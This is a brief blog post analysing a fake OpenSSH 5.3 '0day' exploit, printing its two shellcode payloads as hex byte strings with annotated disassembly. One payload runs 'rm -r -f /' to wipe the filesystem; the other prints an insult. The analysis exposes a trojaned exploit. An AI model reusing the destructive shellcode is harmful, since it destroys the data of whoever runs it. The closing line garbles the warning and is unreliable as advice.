A quick look of a fake 0day exploit :)

Just a normal day of work, I’m searching for vulnerability about OpenSSH 5.3. Surprisingly, there is an RCE 0day exploit on Github. I take a look at the exploit code before I compile it. Strangely, the exploit code is so simple especially the shellcode.

There are two shellcode in the exploit. I wrote some comments with assembly code.

decoder:

1
2
3
python -c 'print "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"' > decoder.bin

objdump -D -b binary -M intel -m i386 decoder.bin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
00000000 <.data>:
0: 6a 0b push 0xb
2: 58 pop eax // syscall: sys_execve
3: 99 cdq
4: 52 push edx
5: 6a 2f push 0x2f
7: 89 e7 mov edi,esp
9: 52 push edx
a: 66 68 2d 66 pushw 0x662d // "-f"
e: 89 e6 mov esi,esp
10: 52 push edx
11: 66 68 2d 72 pushw 0x722d // "-r"
15: 89 e1 mov ecx,esp
17: 52 push edx
18: 68 2f 2f 72 6d push 0x6d722f2f // "//rm"
1d: 68 2f 62 69 6e push 0x6e69622f // "/bin"
22: 89 e3 mov ebx,esp
24: 52 push edx
25: 57 push edi
26: 56 push esi
27: 51 push ecx
28: 53 push ebx
29: 89 e1 mov ecx,esp
2b: cd 80 int 0x80 // syscall
2d: 0a .byte 0xa

rootshell:

1
2
3
python -c 'print "\x31\xd2\xb2\x0a\xb9\x6f\x75\x21\x0a\x51\xb9\x63\x6b\x20\x79\x51\x66\xb9\x66\x75\x66\x51\x31\xc9\x89\xe1\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\x31\xc0\x31\xdb\x40\xcd\x80"' > rootshell.bin

objdump -D -b binary -M intel -m i386 rootshell.bin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
00000000 <.data>:
0: 31 d2 xor edx,edx
2: b2 0a mov dl,0xa
4: b9 6f 75 21 0a mov ecx,0xa21756f // "ou!"
9: 51 push ecx
a: b9 63 6b 20 79 mov ecx,0x79206b63 // "ck y"
f: 51 push ecx
10: 66 b9 66 75 mov cx,0x7566 // "fu"
14: 66 51 push cx
16: 31 c9 xor ecx,ecx
18: 89 e1 mov ecx,esp
1a: 31 db xor ebx,ebx
1c: b3 01 mov bl,0x1 // sys_write ebx: fd = 1
1e: 31 c0 xor eax,eax
20: b0 04 mov al,0x4 // syscall: sys_write
22: cd 80 int 0x80 // syscall
24: 31 c0 xor eax,eax
26: 31 db xor ebx,ebx
28: 40 inc eax // syscall: sys_exit
29: cd 80 int 0x80 // syscall
2b: 0a .byte 0xa

That’s all. A fake 0day exploit.

After some searching, I found an older post from pastbin and another people’s analysis blog. Also, there was already an issue on GitHub reference to the same blog. It seems like I’m too involved in the research without searching for some related information first :)

All in all, it is a short relaxing moment on Monday’s working hours. Use the exploit before you read it and understanding it.

BTW, no RCE exploit TAT.